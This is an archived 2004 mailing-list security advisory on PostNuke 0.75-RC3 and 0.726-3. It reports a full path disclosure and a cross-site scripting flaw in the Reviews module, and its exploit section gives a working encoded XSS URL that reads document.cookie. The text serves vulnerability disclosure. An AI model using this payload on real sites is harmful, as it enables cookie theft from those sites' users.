| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <1090145312.5513.200576720@webmail.messagingengine.com>
From: darkbicho at fastmail.fm (DarkBicho)
Subject: Multiple vulnerabilities PostNuke
Original Advisory: http://www.swp-zone.org/archivos/advisory-10.txt
-------------------------------------------------------------------------------------------------
:.: Multiple vulnerabilities PostNuke :.:
PROGRAM: PostNuke
HOMEPAGE: http://www.postnuke.com/
VERSION: 0.75-RC3, 0.726-3
BUG: Multiple vulnerabilities
DATE: 14/05/2004
AUTHOR: DarkBicho
web: http://www.darkbicho.tk
team: Security Wari Proyects <www.swp-zone.org>
Perunderforce <www.perunderforce.tk>
Email: darkbicho@...u.com
-------------------------------------------------------------------------------------------------
1.- Affected software description:
-----------------------------
Postnuke is a popular content management system, written in php.
2.- Vulnerabilities:
---------------
A. Full path disclosure:
This vulnerability would allow a remote user to determine the full
path to the web root directory and other potentially sensitive
information.
http://localhost/html/modules/Xanthia/pnadmin.php
Fatal error: Call to undefined function: pnmodgetvar() in
c:\appserv\www\html\modules\xanthia\pnadmin.php on line 53
http://localhost/html/modules/Xanthia/pnuserapi.php
Fatal error: Call to undefined function: pnmodgetvar() in
c:\appserv\www\html\modules\xanthia\pnuserapi.php on line 49
B. Cross-Site Scripting aka XSS:
Error: function showcontent()
:.: title :
Line 986
--------------------------------- code
------------------------------------------
echo "<p><span
class=\"pn-title\"><strong><em>".pnVarPrepForDisplay($title)."
</em></strong></span><br />";
echo "<p align=\"justify\"><span class=\"pn-normal\">";
if ($cover != "")
----------------------------------------------------------------------------------
3.- EXPLOIT:
???????
http://localhost/html/modules.php?op=modload&name=Reviews&file=index&req=showcontent
&id=1&title=%253cscript>alert%2528document.cookie);%253c/script>
Example:
-------
http://www.swp-zone.org/archivos/post-nuke.gif
4.- SOLUTION:
????????
Vendors were contacted many weeks ago and plan to release a fixed
version soon.
Check the PostNuke website for updates and official release details.
5.- Greetings:
---------
greetings to my Peruvian group swp and perunderforce :D
"EL PISCO ES Y SERA PERUANO"
5.- Contact
-------
WEB: http://www.darkbicho.tk
EMAIL: darkbicho@...u.com
-------------------------------------------------------------------------------------------------
___________ ____________
/ _____/ \ / \______ \
\_____ \\ \/\/ /| ___/
/ \\ / | |
/_______ / \__/\ / |____|
\/ \/
Security Wari Projects
(c) 2002 - 2004
Made in Peru
----------------------------------------[ EOF
]----------------------------------------------
?
??
??
DarkBicho
Web: http://www.darkbicho.tk
"Mi unico delito es ver lo que otros no pueden ver"
---------------------- The End ----------------------
Powered by blists - more mailing lists